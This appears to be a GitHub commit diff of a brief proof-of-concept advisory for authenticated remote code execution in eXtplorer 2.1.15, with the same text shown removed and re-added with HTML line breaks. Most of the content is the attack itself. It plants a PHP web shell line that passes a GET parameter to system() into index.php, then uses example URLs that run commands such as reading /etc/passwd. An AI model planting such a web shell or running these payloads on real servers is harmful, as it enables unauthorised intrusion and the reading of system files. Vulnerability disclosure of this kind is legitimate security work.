| 1 | | - | Title: eXtplorer 2.1.15 – Insecure Permissions following Remote Code Execution (Authenticated) |
| 2 | | - | Date: 2022-11-09 |
| 3 | | - | Author: Francisco Marinho |
| 4 | | - | Vendor Homepage: http://extplorer.net/ |
| 5 | | - | Software Link: http://extplorer.net/attachments/download/99/eXtplorer_2.1.15.zip |
| 6 | | - | Version: 2.1.15 |
| 7 | | - | Tested on: Linux |
| 8 | | - | ==========> POC <========== |
| 9 | | - | |
| 10 | | - | 1- Login with your account |
| 11 | | - | 2- Access the directory /index.php |
| 12 | | - | 3- Edit index.php, adding “system($_GET[‘tristao’]);” on line two. |
| 13 | | - | 4- Acess homepage index.php |
| 14 | | - | Examples: |
| 15 | | - | cat /etc/passwd |
| 16 | | - | /index.php?tristao=cat%20%20/etc/passwd |
| 17 | | - | cat ls -la |
| 18 | | - | /index.php?tristao=ls%20-la |
| | 1 | + | Title: eXtplorer 2.1.15 – Insecure Permissions following Remote Code Execution (Authenticated)<br> |
| | 2 | + | Date: 2022-11-09<br> |
| | 3 | + | Author: Francisco Marinho<br> |
| | 4 | + | Vendor Homepage: http://extplorer.net/<br> |
| | 5 | + | Software Link: http://extplorer.net/attachments/download/99/eXtplorer_2.1.15.zip<br> |
| | 6 | + | Version: 2.1.15<br> |
| | 7 | + | Tested on: Linux<br> |
| | 8 | + | ==========> POC <==========<br> |
| | 9 | + | <br> |
| | 10 | + | 1- Login with your account<br> |
| | 11 | + | 2- Access the directory /index.php<br> |
| | 12 | + | 3- Edit index.php, adding “system($_GET[‘tristao’]);” on line two.<br> |
| | 13 | + | 4- Acess homepage index.php<br> |
| | 14 | + | Examples:<br> |
| | 15 | + | cat /etc/passwd<br> |
| | 16 | + | /index.php?tristao=cat%20%20/etc/passwd<br> |
| | 17 | + | cat ls -la<br> |
| | 18 | + | /index.php?tristao=ls%20-la<br> |
| 19 | 19 | | |
Tristão Marinho
committed
with
GitHub
1 year ago
1 parent 74e47bf0